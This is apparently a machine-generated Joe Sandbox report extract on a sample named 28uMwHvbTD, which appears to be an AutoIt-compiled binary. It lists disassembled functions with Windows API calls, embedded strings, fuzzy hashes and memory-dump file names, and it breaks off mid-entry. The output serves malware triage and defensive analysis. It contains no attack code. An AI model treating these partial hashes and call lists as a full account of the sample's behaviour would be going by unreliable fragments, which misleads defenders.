Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 598c5c04068f86805374dbccf88ac49770392c5ea93f330fc2ef54b7674c7012
Instruction ID: 8babff130f3dd6271f4f0b37ee042993dbc7e5512d97f5252e45edc96607059b
Opcode Fuzzy Hash: 598c5c04068f86805374dbccf88ac49770392c5ea93f330fc2ef54b7674c7012
Instruction Fuzzy Hash: B311C8B6905658BFD7119FA89C08E9B7FADEBC5320F148369F814D3250D6BAC9048BB1

Function 00798202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0079821E
GetLastError.KERNEL32(?,00797CE2,?,?,?), ref: 00798228
GetProcessHeap.KERNEL32(00000008,?,?,00797CE2,?,?,?), ref: 00798237
RtlAllocateHeap.NTDLL(00000000,?,00797CE2), ref: 0079823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00798255

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 3fcb905a85b6432beafa1cc37e207525efedf98fb79358a92d8eaf0d9da6826a
Instruction ID: 4240ad419defe60d08facbefe6a270c90cfa0a3401a63bb0d449f28daba64722
Opcode Fuzzy Hash: 3fcb905a85b6432beafa1cc37e207525efedf98fb79358a92d8eaf0d9da6826a
Instruction Fuzzy Hash: 7D014671200608BFDB204FA6EC48D6B7FAEFF8A754B50452AF809C3220DB398C00DA60

Function 0079710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE ref: 00797127
ProgIDFromCLSID.COMBASE(?,00000000), ref: 00797142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00797044,80070057,?,?), ref: 00797150
CoTaskMemFree.COMBASE(00000000), ref: 00797160
CLSIDFromString.COMBASE(?,?), ref: 0079716C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 9abd73a3ff142f7eee76491eec26d37ca250c28ce303d612792ff6d634b5f6f9
Instruction ID: ae559dcf84409cb0665a246a19b115495ea61eaf7b5d81fc0b5a17045150c438
Opcode Fuzzy Hash: 9abd73a3ff142f7eee76491eec26d37ca250c28ce303d612792ff6d634b5f6f9
Instruction Fuzzy Hash: 14017C72621208BBDB154F64EC44EAA7BEEEB847A1F148068FD04D6220D739DD41DBA4

Function 007A5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007A526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007A5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A52BC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: cedbbdf3e533ee48d421a57fb5b34d03df189044e6b55b80eec4e53aed0567f5
Instruction ID: d7b93228bc8f0c2a3331cd58661eefbf803d2be955f368b85a6ecbdb95d18f9a
Opcode Fuzzy Hash: cedbbdf3e533ee48d421a57fb5b34d03df189044e6b55b80eec4e53aed0567f5
Instruction Fuzzy Hash: E80169B1D01A1DDBCF00EFE4E848AEDBB78FB4E311F45425AE941F2181CB3859508BA5

Function 0079810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00798121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0079812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079813A
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00798141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00798157

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 424d3d36fd13b25fa618d3e93855367880e5fc2885762cd348a26c34985aa8eb
Instruction ID: 2f868d0d9cdac07533dd1a23d59e71f8d796f32f8b627577d939d68249a986c1
Opcode Fuzzy Hash: 424d3d36fd13b25fa618d3e93855367880e5fc2885762cd348a26c34985aa8eb
Instruction Fuzzy Hash: 65F0C270240308BFEB510FA5EC88E6B3BADFF4AB54B00402DF945C2150CB689C41DA65

Function 0079C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0079C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0079C20E
MessageBeep.USER32(00000000), ref: 0079C226
KillTimer.USER32(?,0000040A), ref: 0079C242
EndDialog.USER32(?,00000001), ref: 0079C25C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 17b350a740e65837a20a5859d350a162b9150f81e158b7991aef45c8cb876345
Instruction ID: 03455db2fd6c54a3966a626fd0f0790929c0b477b9698c94b350822bccd30972
Opcode Fuzzy Hash: 17b350a740e65837a20a5859d350a162b9150f81e158b7991aef45c8cb876345
Instruction Fuzzy Hash: 6D01D630404704ABEF255B60ED4EF9677B9FF00B06F00826DF582A14E1DBF86944DB94

Function 007413B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007413BF
StrokeAndFillPath.GDI32(?,?,0077B888,00000000,?), ref: 007413DB
SelectObject.GDI32(?,00000000), ref: 007413EE
DeleteObject.GDI32 ref: 00741401
StrokePath.GDI32(?), ref: 0074141C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: bce4cc72a1e4e673526b5d00b457ccc886ec286d71278a9149cba55fd6fc5fc5
Instruction ID: 4089c73244090f5141412d4a1d7a17fbd4ffa4444d9bc89f7174e98e3d46aa05
Opcode Fuzzy Hash: bce4cc72a1e4e673526b5d00b457ccc886ec286d71278a9149cba55fd6fc5fc5
Instruction Fuzzy Hash: 25F03730000B48EBDB516F6AEC4CB5A3FA5BB00726F58C238E869880F1C73889D5DF24

Function 00798992 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0079899D
CloseHandle.KERNEL32(?), ref: 007989B2
CloseHandle.KERNEL32(?), ref: 007989BA
GetProcessHeap.KERNEL32(00000000,?), ref: 007989C3
HeapFree.KERNEL32(00000000), ref: 007989CA

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessSingleWait
String ID:
API String ID: 3751786701-0
Opcode ID: b2ca2e09e2ca254eb1686e887b3966bcc6a03551158cc9da49719b017fac04b3
Instruction ID: 9fb6c19a1b5142b2a27ed841e2c9f7799956dafae32b7ede7bc083ba5f41278d
Opcode Fuzzy Hash: b2ca2e09e2ca254eb1686e887b3966bcc6a03551158cc9da49719b017fac04b3
Instruction Fuzzy Hash: 4EE0C236004805FBDA011FE2EC0CD0ABF6AFB89322B54823AF21981070CB3A9820DB58

Function 007AC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007AC432
CoCreateInstance.COMBASE(007D2D6C,00000000,00000001,007D2BDC,?), ref: 007AC44A

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

CoUninitialize.COMBASE ref: 007AC6B7

Strings

.lnk, xrefs: 007AC3C6, 007AC3EE, 007AC3F8

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 5edba8636b90c804e6fbf8f5487148b8980b4d5400f5612efabb4ff18a6201d4
Instruction ID: 3eb2de92c1a880fd42d501c4c815821927dc0807bf0277f93e8e640c7e89592f
Opcode Fuzzy Hash: 5edba8636b90c804e6fbf8f5487148b8980b4d5400f5612efabb4ff18a6201d4
Instruction Fuzzy Hash: E3A129B1204205EFD704EF54C885EABB7E8EF99354F004A1DF1558B1A2EB75AA09CB62

Function 00752CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00760DB6: std::exception::exception.LIBCMT ref: 00760DEC
Part of subcall function 00760DB6: __CxxThrowException@8.LIBCMT ref: 00760E01

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 00747A51: _memmove.LIBCMT ref: 00747AAB

__swprintf.LIBCMT ref: 00752ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00752D66

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: ab6154a198ae50e8254e99280d474de873289278dde14f7ede458ddf59dcbc18
Instruction ID: 20c89740b8da201a355f0044d1ccb4ca6759b7877223add56cc1265d2d8b1f08
Opcode Fuzzy Hash: ab6154a198ae50e8254e99280d474de873289278dde14f7ede458ddf59dcbc18
Instruction Fuzzy Hash: 01914D71108201EFC714EF24C89ACAFB7A4EF95710F14491DF9469B2A2EB78ED49CB52

Function 007AB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00744750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00744743,?,?,007437AE,?), ref: 00744770

CoInitialize.OLE32(00000000), ref: 007AB9BB
CoCreateInstance.COMBASE(007D2D6C,00000000,00000001,007D2BDC,?), ref: 007AB9D4
CoUninitialize.COMBASE ref: 007AB9F1

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

Strings

.lnk, xrefs: 007AB99D, 007AB9AB

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: ee70b9da513a5ae09d64a20ef7a32532603fdd6f7ae46ef9b62d4efa47d5523d
Instruction ID: 6172fb6b117661588d8666f7a449e2d6abcdd55f460cb627680f20119ecd96ba
Opcode Fuzzy Hash: ee70b9da513a5ae09d64a20ef7a32532603fdd6f7ae46ef9b62d4efa47d5523d
Instruction Fuzzy Hash: 73A13475604205DFCB14DF14C484D6ABBE5FF8A324F048A58F99A9B3A2CB35EC46CB91

Function 0079B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0079B4BE

Strings

%}, xrefs: 0079B561
Container, xrefs: 0079B43B
AutoIt3GUI, xrefs: 0079B436

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%}
API String ID: 3565006973-3704997335
Opcode ID: 49bc74975af8c564d1ad7c2b4689323af00e8029c5309188e1714f6af8452c75
Instruction ID: 4f8a78e2ae3b896d43470d6ab2985691fca46c751bfed14c39fdd8c65fccd002
Opcode Fuzzy Hash: 49bc74975af8c564d1ad7c2b4689323af00e8029c5309188e1714f6af8452c75
Instruction Fuzzy Hash: F19139B0600601EFDB14DF64E984A6ABBF5FF49710F20856DE94ACB3A1DB74E841CB60

Function 0076501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007650AD

Part of subcall function 007700F0: __87except.LIBCMT ref: 0077012B

Strings

pow, xrefs: 00765085, 007650A2

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 6a40e527faf073504da6828d369dfa9bdca22e8f373a90cd3c92187fb50fd22a
Instruction ID: bb00d3ea7fa5442aba3329cae69ba3755c3a954cb189c1a8df322d7585be6efc
Opcode Fuzzy Hash: 6a40e527faf073504da6828d369dfa9bdca22e8f373a90cd3c92187fb50fd22a
Instruction Fuzzy Hash: 78517821A0C606C7DF156724C80537E2B94AB01390F20C959E8DF862AAEE3CCDC4EAC6

Function 00788584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0078862B
_memmove.LIBCMT ref: 00788685

Strings

_u, xrefs: 007886FF, 0078DFDC, 0078DFF8
3cu, xrefs: 0078860C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove
String ID: 3cu$_u
API String ID: 4104443479-3001241828
Opcode ID: f2ab404ce989ad69286cd27b364a796235e57baebc806cab1798499e5b581484
Instruction ID: 2cbf07fc736fb4e10bc8eaf58126dce76e418f65799613b2ffa3014862d96dbc
Opcode Fuzzy Hash: f2ab404ce989ad69286cd27b364a796235e57baebc806cab1798499e5b581484
Instruction Fuzzy Hash: 18518E70A00609DFCF64DF68C884AAEB7F1FF44304F648529E85AD7250EB39A995CB52

Function 007C7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007CF910,00000000,?,?,?,?), ref: 007C79DF
GetWindowLongW.USER32 ref: 007C79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C7A0C

Strings

SysTreeView32, xrefs: 007C79B1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 524c30b464a1658842b8696b97e2ae4aadc920e87100400982de3057eecef2e1
Instruction ID: c1e22d75a404592e9f47c52e41e847f4be7cc922ca530a07bcc0bfac53a3391d
Opcode Fuzzy Hash: 524c30b464a1658842b8696b97e2ae4aadc920e87100400982de3057eecef2e1
Instruction Fuzzy Hash: F231CE31204606ABDB158E38CC45FEA77A9FB04324F20872DF975A22E0DB39E951DB60

Function 007C73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007C7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007C7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 007C7499

Strings

SysMonthCal32, xrefs: 007C742C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 9206d5eccf4610a2dc7c8d33d48c605266b76304df2fbda2681d3050aff74f36
Instruction ID: 432ecab6fcf6f6e65caa19e58ce1e3a4e601365da0ed3bc7b2e563daf59d3ac7
